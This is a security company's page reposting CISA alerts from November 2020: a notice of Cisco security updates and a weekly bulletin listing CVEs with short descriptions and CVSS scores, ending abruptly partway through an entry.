DefendEdge Logo
Categories
alerts

Cisco Releases Security Updates for Multiple Products

Original release date: November 19, 2020<br/><p>Cisco has released security updates to address vulnerabilities in multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.</p>

<p>The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates.</p>

<ul>
<li>Integrated Management Controller Multiple Remote Code Execution Vulnerabilities <a href=”https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucs-api-rce-UXwpeDHd”>cisco-sa-ucs-api-rce-UXwpeDHd</a></li>
<li>DNA Spaces Connector Command Injection Vulnerability <a href=”https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dna-cmd-injection-rrAYzOwc”>cisco-sa-dna-cmd-injection-rrAYzOwc</a></li>
<li>IoT Field Network Director Unauthenticated REST API Vulnerability <a href=”https://us-cert.cisa.gov https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-FND-BCK-GHkPNZ5F”>cisco-sa-FND-BCK-GHkPNZ5F</a></li>
<li>Secure Web Appliance Privilege Escalation Vulnerability <a href=”https://us-cert.cisa.gov https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wsa-prv-esc-nPzWZrQj”>cisco-sa-wsa-prv-esc-nPzWZrQj</a></li>
<li>IoT Field Network Director SOAP API Authorization Bypass Vulnerability <a href=”https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-FND-AUTH-vEypBmmR”>cisco-sa-FND-AUTH-vEypBmmR</a></li>
<li>IoT Field Network Director Missing API Authentication Vulnerability <a href=”https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-FND-APIA-xZntFS2V”>cisco-sa-FND-APIA-xZntFS2V</a></li>
</ul>

<p>For updates addressing lower severity vulnerabilities, see the Cisco <a href=”https://us-cert.cisa.gov https://tools.cisco.com/security/center/publicationListing.x”>Security Advisories page</a>.<br />
&nbsp;</p>

<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy &amp; Use</a> policy.</p>

</div>

Categories
alerts

Vulnerability Summary for the Week of November 9, 2020

Original release date: November 16, 2020

The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
bbraun — onlinesuite_application_package A relative path traversal attack in the B. Braun OnlineSuite Version AP 3.0 and earlier allows unauthenticated attackers to upload or download arbitrary files. 2020-11-06 7.5 CVE-2020-25172
MISC
google — android In btm_sec_disconnected of btm_sec.cc, there is a possible memory corruption due to a use after free. This could lead to remote code execution in the Bluetooth server with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1Android ID: A-162497143 2020-11-10 9.3 CVE-2020-0449
MISC
google — android In sbrDecoder_AssignQmfChannels2SbrChannels of sbrdecoder.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9 Android-8.0 Android-8.1Android ID: A-158762825 2020-11-10 9.3 CVE-2020-0451
MISC
google — android In Message and toBundle of Notification.java, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service requiring a device reset to fix with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-158304295 2020-11-10 7.8 CVE-2020-0441
MISC
google — android In Message and toBundle of Notification.java, there is a possible UI slowdown or crash due to improper input validation. This could lead to remote denial of service if a malicious contact file is received, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.0 Android-8.1 Android-9Android ID: A-147358092 2020-11-10 7.8 CVE-2020-0442
MISC
google — android There is a possible out of bounds write due to a missing bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-168264527 2020-11-10 7.5 CVE-2020-0445
MISC
google — android There is a possible out of bounds write due to a missing bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-168264528 2020-11-10 7.5 CVE-2020-0446
MISC
google — android There is a possible out of bounds write due to a missing bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-168251617 2020-11-10 7.5 CVE-2020-0447
MISC
google — android In exif_entry_get_value of exif-entry.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if a third party app used this library to process remote image data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-159625731 2020-11-10 7.5 CVE-2020-0452
FEDORA
MISC
google — android An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), Q(10.0), and R(11.0) software. Attackers can bypass Factory Reset Protection (FRP) via Secure Folder. The Samsung ID is SVE-2020-18546 (November 2020). 2020-11-08 7.5 CVE-2020-28340
MISC
ibm — filenet_content_manager IBM FileNet Content Manager 5.5.4 and 5.5.5 is potentially vulnerable to CVS Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 188736. 2020-11-09 9.3 CVE-2020-4759
XF
CONFIRM
linuxfoundation — nats-server The JWT library in NATS nats-server before 2.1.9 has Incorrect Access Control because of how expired credentials are handled. 2020-11-06 7.5 CVE-2020-26892
MISC
CONFIRM
magento — magento Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by an unsafe file upload vulnerability that could result in arbitrary code execution. This vulnerability could be abused by authenticated users with administrative permissions to the System/Data and Transfer/Import components. 2020-11-09 9 CVE-2020-24407
MISC
sap — netweaver_application_server_java SAP NetWeaver AS JAVA, versions – 7.20, 7.30, 7.31, 7.40, 7.50, allows an attacker who is authenticated as an administrator to use the administrator console, to expose unauthenticated access to the file system and upload a malicious file. The attacker or another user can then use a separate mechanism to execute OS commands through the uploaded file leading to Privilege Escalation and completely compromise the confidentiality, integrity and availability of the server operating system and any application running on it. 2020-11-10 9 CVE-2020-26820
MISC
MISC

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
bbraun — onlinesuite_application_package A DLL hijacking vulnerability in the B. Braun OnlineSuite Version AP 3.0 and earlier allows local attackers to execute code on the system as a high privileged user. 2020-11-06 6.9 CVE-2020-25174
MISC
bbraun — onlinesuite_application_package An Excel Macro Injection vulnerability exists in the export feature in the B. Braun OnlineSuite Version AP 3.0 and earlier via multiple input fields that are mishandled in an Excel export. 2020-11-06 6.8 CVE-2020-25170
MISC
canonical — ubuntu_linux Ubuntu’s packaging of libvirt in 20.04 LTS created a control socket with world read and write permissions. An attacker could use this to overwrite arbitrary files or execute arbitrary code. 2020-11-06 4.6 CVE-2020-15708
MISC
cisco — anyconnect_secure_mobility_client A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to read arbitrary files on the underlying operating system of an affected device. The vulnerability is due to an exposed IPC function. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process on an affected device. A successful exploit could allow the attacker to read arbitrary files on the underlying operating system of the affected device. 2020-11-06 4.9 CVE-2020-27123
CISCO
google — android An issue was discovered on Samsung mobile devices with Q(10.0) (Exynos990 chipsets) software. The S3K250AF Secure Element CC EAL 5+ chip allows attackers to execute arbitrary code and obtain sensitive information via a buffer overflow. The Samsung ID is SVE-2020-18632 (November 2020). 2020-11-08 4.6 CVE-2020-28341
MISC
google — android An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (China / India) software. The S Secure application allows attackers to bypass authentication for a locked Gallery application via the Reminder application. The Samsung ID is SVE-2020-18689 (November 2020). 2020-11-08 6.8 CVE-2020-28342
MISC
google — android An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (Exynos 980, 9820, and 9830 chipsets) software. The NPU driver allows attackers to execute arbitrary code because of unintended write and read operations on memory. The Samsung ID is SVE-2020-18610 (November 2020). 2020-11-08 4.6 CVE-2020-28343
MISC
google — android In rw_i93_sm_format of rw_i93.cc, there is a possible out of bounds read due to uninitialized data. This could lead to remote information disclosure over NFC with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-157650336 2020-11-10 4.3 CVE-2020-0450
MISC
google — android In generatePackageInfo of PackageManagerService.java, there is a possible permissions bypass due to an incorrect permission check. This could lead to local escalation of privilege that allows instant apps access to permissions not allowed for instant apps, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-140256621 2020-11-10 4.6 CVE-2020-0439
MISC
google — android In the AIBinder_Class constructor of ibinder.cpp, there is a possible arbitrary code execution due to uninitialized data. This could lead to local escalation of privilege if a process were using libbinder_ndk in a vulnerable way with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-161812320 2020-11-10 4.6 CVE-2020-0438
MISC
hp — oneview There is a remote escalation of privilege possible for a malicious user that has a OneView account in OneView and Synergy Composer. HPE has provided updates to Oneview and Synergy Composer: Update to version 5.5 of OneView, Composer, or Composer2. 2020-11-06 6.5 CVE-2020-7198
MISC
ibm — urbancode_deploy IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 could disclose sensitive information to an authenticated user that could be used in further attacks against the system. IBM X-Force ID: 181858. 2020-11-06 4 CVE-2020-4484
XF
CONFIRM
ibm — urbancode_deploy IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 181857. 2020-11-06 4 CVE-2020-4483
XF
CONFIRM
ibm — urbancode_deploy IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 could allow an authenticated user to bypass security. A user with access to a snapshot could apply unauthorized additional statuses via direct rest calls. IBM X-Force ID: 181856. 2020-11-06 4 CVE-2020-4482
XF
CONFIRM
joplin_project — joplin Joplin 1.2.6 for Desktop allows XSS via a LINK element in a note. 2020-11-06 4.3 CVE-2020-28249
MISC
MISC
lightbend — play_framework An issue was discovered in PlayJava in Play Framework 2.6.0 through 2.8.2. The body parsing of HTTP requests eagerly parses a payload given a Content-Type header. A deep JSON structure sent to a valid POST endpoint (that may or may not expect JSON payloads) causes a StackOverflowError and Denial of Service. 2020-11-06 5 CVE-2020-27196
MISC
MISC
lightbend — play_framework In Play Framework 2.6.0 through 2.8.2, data amplification can occur when an application accepts multipart/form-data JSON input. 2020-11-06 5 CVE-2020-26882
MISC
MISC
lightbend — play_framework In Play Framework 2.6.0 through 2.8.2, stack consumption can occur because of unbounded recursion during parsing of crafted JSON documents. 2020-11-06 5 CVE-2020-26883
MISC
MISC
linuxfoundation — nats-server The JWT library in NATS nats-server before 2.1.9 allows a denial of service (a nil dereference in Go code). 2020-11-06 5 CVE-2020-26521
CONFIRM
MISC
magento — magento Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect authorization vulnerability. A user can still access resources provisioned under their old role after an administrator removes the role or disables the user’s account. 2020-11-09 5.5 CVE-2020-24401
MISC
magento — magento Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect permissions vulnerability within the Integrations component. This vulnerability could be abused by users with permissions to the Pages resource to delete cms pages via the REST API without authorization. 2020-11-09 5.5 CVE-2020-24404
MISC
magento — magento Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect permissions vulnerability in the Integrations component. This vulnerability could be abused by authenticated users with permissions to the Resource Access API to delete customer details via the REST API without authorization. 2020-11-09 5.5 CVE-2020-24402
MISC
magento — magento When in maintenance mode, Magento version 2.4.0 and 2.3.4 (and earlier) are affected by an information disclosure vulnerability that could expose the installation path during build deployments. This information could be helpful to attackers if they are able to identify other exploitable vulnerabilities in the environment. 2020-11-09 4.3 CVE-2020-24406
MISC
magento — magento Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect user permissions vulnerability within the Inventory component. This vulnerability could be abused by authenticated users with Inventory and Source permissions to make unauthorized changes to inventory source data via the REST API. 2020-11-09 4 CVE-2020-24403
MISC
magento — magento Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect permissions issue vulnerability in the Inventory module. This vulnerability could be abused by authenticated users to modify inventory stock data without authorization. 2020-11-09 4 CVE-2020-24405
MISC
magento — magento Magento versions 2.4.0 and 2.3.5 (and earlier) are affected by an SQL Injection vulnerability that could lead to sensitive information disclosure. This vulnerability could be exploited by an authenticated user with permissions to the product listing page to read data from the database. 2020-11-09 5.5 CVE-2020-24400
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17055. 2020-11-11 6.8 CVE-2020-17044
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. 2020-11-11 4.6 CVE-2020-17033
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. 2020-11-11 4.6 CVE-2020-17034
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. 2020-11-11 4.6 CVE-2020-17032
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044. 2020-11-11 6.8 CVE-2020-17055
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. 2020-11-11 4.6 CVE-2020-17031
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. 2020-11-11 4.6 CVE-2020-17026
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. 2020-11-11 4.6 CVE-2020-17025
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. 2020-11-11 4.6 CVE-2020-17027
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. 2020-11-11 4.6 CVE-2020-17028
MISC
microsoft — windows_10 Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17044, CVE-2020-17055. 2020-11-11 6.8 CVE-2020-17043
MISC
netapp — e-series_santricity_os_controller SANtricity OS Controller Software versions 11.50.1 and higher are susceptible to a vulnerability which could allow an attacker to discover sensitive information by intercepting its transmission within an https session. 2020-11-06 4.3 CVE-2020-8577
MISC
netapp — e-series_santricity_os_controller SANtricity OS Controller Software versions 11.30 and higher are susceptible to a vulnerability which allows an unauthenticated attacker with access to the system to cause a Denial of Service (DoS). 2020-11-06 5 CVE-2020-8580
MISC
pega — pega_platform Pega Platform before 8.4.0 has a XSS issue via stream rule parameters used in the request header. 2020-11-09 4.3 CVE-2020-24353
MISC
MISC
qemu — qemu ati_2d_blt in hw/display/ati_2d.c in QEMU 4.2.1 can encounter an outside-limits situation in a calculation. A guest can crash the QEMU process. 2020-11-06 4 CVE-2020-27616
CONFIRM
MISC
qemu — qemu eth_get_gso_type in net/eth.c in QEMU 4.2.1 allows guest OS users to trigger an assertion failure. A guest can crash the QEMU process via packet data that lacks a valid Layer 3 protocol. 2020-11-06 4 CVE-2020-27617
CONFIRM
MISC
sap — solution_manager SAP Solution Manager (JAVA stack), version – 7.20, allows an unauthenticated attacker to compromise the system because of missing authorization checks in the Upgrade Legacy Ports Service, this has an impact to the integrity and availability of the service. 2020-11-10 6.4 CVE-2020-26824
MISC
MISC
sap — solution_manager SAP Solution Manager (JAVA stack), version – 7.20, allows an unauthenticated attacker to compromise the system because of missing authorization checks in the Upgrade Diagnostics Agent Connection Service, this has an impact to the integrity and availability of the service. 2020-11-10 6.4 CVE-2020-26823
MISC
MISC
sap — solution_manager SAP Solution Manager (JAVA stack), version – 7.20, allows an unauthenticated attacker to compromise the system because of missing authorization checks in the Outside Discovery Configuration Service, this has an impact to the integrity and availability of the service. 2020-11-10 6.4 CVE-2020-26822
MISC
MISC
sap — solution_manager SAP Solution Manager (JAVA stack), version – 7.20, allows an unauthenticated attacker to compromise the system because of missing authorization checks in the SVG Converter Service, this has an impact to the integrity and availability of the service. 2020-11-10 6.4 CVE-2020-26821
MISC
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
google — android In CellBroadcastReceiver’s intent handlers, there is a possible denial of service due to a missing permission check. This could lead to local denial of service of emergency alerts with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-162741784 2020-11-10 2.1 CVE-2020-0437
MISC
google — android In LocaleList of LocaleList.java, there is a possible forced reboot due to an uncaught exception. This could lead to local denial of service requiring factory reset to restore with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152410253 2020-11-10 2.1 CVE-2020-0443
MISC
google — android In getPhoneAccountsForPackage of TelecomServiceImpl.java, there is a possible way to access a tracking identifier due to a missing permission check. This could lead to local information disclosure of the identifier, which could be used to track an account across devices, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-153995334 2020-11-10 2.1 CVE-2020-0448
MISC
google — android In updateNotification of BeamTransferManager.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-8.0 Android-8.1Android ID: A-159060474 2020-11-10 2.1 CVE-2020-0453
MISC
google — android In callCallbackForRequest of ConnectivityService.java, there is a possible permission bypass due to a missing permission check. This could lead to local information disclosure of the current SSID with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9Android ID: A-161370134 2020-11-10 2.1 CVE-2020-0454
MISC
ibm — maximo_spatial_asset_management IBM Maximo Spatial Asset Management 7.6.0.3, 7.6.0.4, 7.6.0.5, and 7.6.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 186024. 2020-11-09 2.9 CVE-2020-4651
XF
CONFIRM
ibm — maximo_spatial_asset_management IBM Maximo Spatial Asset Management 7.6.0.3, 7.6.0.4, 7.6.0.5, and 7.6.1.0 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 186023. 2020-11-09 2.1 CVE-2020-4650
XF
CONFIRM

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
a10_networks — acos_and_agalazy_management_graphical_user_interfaces
 
A10 Networks ACOS and aGalaxy management Graphical User Interfaces (GUIs) have an unauthenticated Remote Code Execution (RCE) vulnerability that could be used to compromise affected ACOS systems. ACOS versions 3.2.x (including and after 3.2.2), 4.x, and 5.1.x are affected. aGalaxy versions 3.0.x, 3.2.x, and 5.0.x are affected. 2020-11-10 not yet calculated CVE-2020-24384
CONFIRM
adobe — acrobat_reader
 
Adobe Acrobat Reader for Android version 20.6.2 (and earlier) does not properly restrict access to directories created by the application. This could result in disclosure of sensitive information stored in databases used by the application. Exploitation requires a victim to download and run a malicious application. 2020-11-12 not yet calculated CVE-2020-24441
MISC
adobe — connect Adobe Connect version 11.0 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2020-11-12 not yet calculated CVE-2020-24443
MISC
adobe — connect
 
Adobe Connect version 11.0 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2020-11-12 not yet calculated CVE-2020-24442
MISC
amd — running_average_power_limit
 
A potential vulnerability in the AMD extension to Linux “hwmon” service may allow an attacker to use the Linux-based Running Average Power Limit (RAPL) interface to show various side channel attacks. In line with industry partners, AMD has updated the RAPL interface to require privileged access. 2020-11-12 not yet calculated CVE-2020-12912
MISC
amd — trusted_platform_modules
 
The Trusted Platform Modules (TPM) reference software may not properly track the number of times a failed shutdown happens. This can leave the TPM in a state where confidential key material in the TPM may be able to be compromised. AMD believes that the attack requires physical access of the device because the power must be repeatedly turned on and off. This potential attack may be used to change confidential information, alter executables signed by key material in the TPM, or create a denial of service of the device. 2020-11-12 not yet calculated CVE-2020-12926
MISC
amd — vbios_flash_tool
 
A potential vulnerability in a dynamically loaded AMD driver in AMD VBIOS Flash Tool SDK may allow any authenticated user to escalate privileges to NT authority system. 2020-11-12 not yet calculated CVE-2020-12927
MISC
apache — airflows_experimental_api
 
The previous default setting for Airflow’s Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default 2020-11-10 not yet calculated CVE-2020-13927
MISC
apache — batik
 
Apache Batik is vulnerable to server-side request forgery, caused by improper input validation by the “xlink:href” attributes. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. 2020-11-12 not yet calculated CVE-2019-17566
MISC
apache — cxf
 
By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to inject javascript into the web page. This vulnerability affects all versions of Apache CXF prior to 3.4.1 and 3.3.8. Please note that this is a separate issue to CVE-2019-17573. 2020-11-12 not yet calculated CVE-2020-13954
MISC
MLIST
MLIST
MLIST
MLIST
MLIST
arm_developer — armv8-m_processors
 
In Arm software implementing the Armv8-M processors (all versions), the stack selection mechanism could be influenced by a stack-underflow attack in v8-M TrustZone based processors. An attacker can cause a change to the stack pointer used by the Secure World from a non-secure application if the stack is not initialized. This vulnerability affects only the software that is based on Armv8-M processors with the Security Extension. 2020-11-12 not yet calculated CVE-2020-16273
CONFIRM
asterisk — open_source
 
A res_pjsip_session crash was discovered in Asterisk Open Source 13.x before 13.37.1, 16.x before 16.14.1, 17.x before 17.8.1, and 18.x before 18.0.1. and Certified Asterisk before 16.8-cert5. Upon receiving a new SIP Invite, Asterisk did not return the created dialog locked or referenced. This caused a gap between the creation of the dialog object, and its next use by the thread that created it. Depending on some off-nominal circumstances and timing, it was possible for another thread to free said dialog in this gap. Asterisk could then crash when the dialog object, or any of its dependent objects, were dereferenced or accessed next by the initial-creation thread. Note, however, that this crash can only occur when using a connection-oriented protocol (e.g., TCP or TLS, but not UDP) for SIP transport. Also, the remote client must be authenticated, or Asterisk must be configured for anonymous calling. 2020-11-06 not yet calculated CVE-2020-28327
MISC
MISC
atlassian — gajira-create_github_action

 

The execute function in in the Atlassian gajira-comment GitHub Action before version 2.0.2 allows remote attackers to execute arbitrary code in the context of a GitHub runner by creating a specially crafted GitHub issue comment. 2020-11-09 not yet calculated CVE-2020-14189
MISC
atlassian — gajira-create_github_action
 
The preprocessArgs function in the Atlassian gajira-create GitHub Action before version 2.0.1 allows remote attackers to execute arbitrary code in the context of a GitHub runner by creating a specially crafted GitHub issue. 2020-11-09 not yet calculated CVE-2020-14188
MISC
atlassian — resourcexpress_meeting_monitor
 
SQL Injection issues in various ASPX pages of ResourceXpress Meeting Monitor 4.9 could lead to remote code execution and information disclosure. 2020-11-12 not yet calculated CVE-2020-13877
CONFIRM
MISC
audi — a7_mmi_2014_vehicles
 
On Audi A7 MMI 2014 vehicles, the Bluetooth stack in Audi A7 MMI Multiplayer with version (N+R_CN_AU_P0395) mishandles %x and %s format string specifiers in a device name. This may lead to memory content leaks and potentially crash the services. 2020-11-11 not yet calculated CVE-2020-27524
MISC
MISC
MISC
avaya — unified_portal_client
 
A Cross Site Scripting (XSS) Vulnerability on the Unified Portal Client (web client) used in Avaya Equinox Conferencing can allow an authenticated user to perform XSS attacks. The affected versions of Equinox Conferencing includes all 9.x versions before 9.1.10. 2020-11-13 not yet calculated CVE-2020-7033
CONFIRM
avaya — weblm
 
An XML external entity (XXE) vulnerability in Avaya WebLM admin interface allows authenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. Affected versions of Avaya WebLM include: 7.0 through 7.1.3.6 and 8.0 through 8.1.2. 2020-11-13 not yet calculated CVE-2020-7032
CONFIRM
azure — devops
 
Azure DevOps Server and Team Foundation Services Spoofing Vulnerability 2020-11-11 not yet calculated CVE-2020-1325
MISC
bab_technologie — eibport_v3
 
BAB TECHNOLOGIE GmbH eibPort V3 prior to 3.8.3 devices allow denial of service (Uncontrolled Resource Consumption) via requests to the lighttpd component. 2020-11-12 not yet calculated CVE-2020-24573
MISC
becton_dickinson_and_company — bd_alaris_8015_pc_unit_and_bd_alaris_systems_manager
 
BD Alaris PC Unit, Model 8015, Versions 9.33.1 and earlier and BD Alaris Systems Manager, Versions 4.33 and earlier The affected products are vulnerable to a network session authentication vulnerability within the authentication process between specified versions of the BD Alaris PC Unit and the BD Alaris Systems Manager. If exploited, an attacker could perform a denial-of-service attack on the BD Alaris PC Unit by modifying the configuration headers of data in transit. A denial-of-service attack could lead to a drop in the wireless capability of the BD Alaris PC Unit, resulting in manual operation of the PC Unit. 2020-11-13 not yet calculated CVE-2020-25165
MISC
bitdefender — update_server
 
Insufficient validation in the Bitdefender Update Server and BEST Relay components of Bitdefender Endpoint Security Tools versions prior to 6.6.20.294 allows an unprivileged attacker to bypass the in-place mitigations and interact with hosts on the network. This issue affects: Bitdefender Update Server versions prior to 6.6.20.294. 2020-11-09 not yet calculated CVE-2020-15297
MISC
brave — brave
 
The implementation of Brave Desktop’s privacy-preserving analytics system (P3A) between 1.1 and 1.18.35 logged the timestamp of when the user last opened an incognito window, including Tor windows. The intended behavior was to log the timestamp for incognito windows excluding Tor windows. Note that if a user has P3A enabled, the timestamp is not sent to Brave’s server, but rather a value from:Used in last 24hUsed in last week but not 24hUsed in last 28 days but not weekEver used but not in last 28 daysNever usedThe privacy risk is low because a local attacker with disk access cannot tell if the timestamp corresponds to a Tor window or a non-Tor incognito window. 2020-11-09 not yet calculated CVE-2020-8276
MISC
cacti — cacti
 
A cross-site scripting (XSS) vulnerability exists in templates_import.php (Cacti 1.2.13) due to Improper escaping of error message during template import preview in the xml_path field 2020-11-12 not yet calculated CVE-2020-25706
CONFIRM
MISC
MISC
canonical — ubuntu
 
An Ubuntu-specific modification to AccountsService in versions before 0.6.55-0ubuntu13.2, among other earlier versions, would perform unbounded read operations on user-controlled ~/.pam_environment files, allowing an infinite loop if /dev/zero is symlinked to this location. 2020-11-11 not yet calculated CVE-2020-16127
CONFIRM
canonical — ubuntu
 
An Ubuntu-specific modification to AccountsService in versions before 0.6.55-0ubuntu13.2, among other earlier versions, improperly dropped the ruid, allowing untrusted users to send signals to AccountService, thus stopping it from handling D-Bus messages in a timely fashion. 2020-11-11 not yet calculated CVE-2020-16126
CONFIRM
capasystems — capainstaller
 
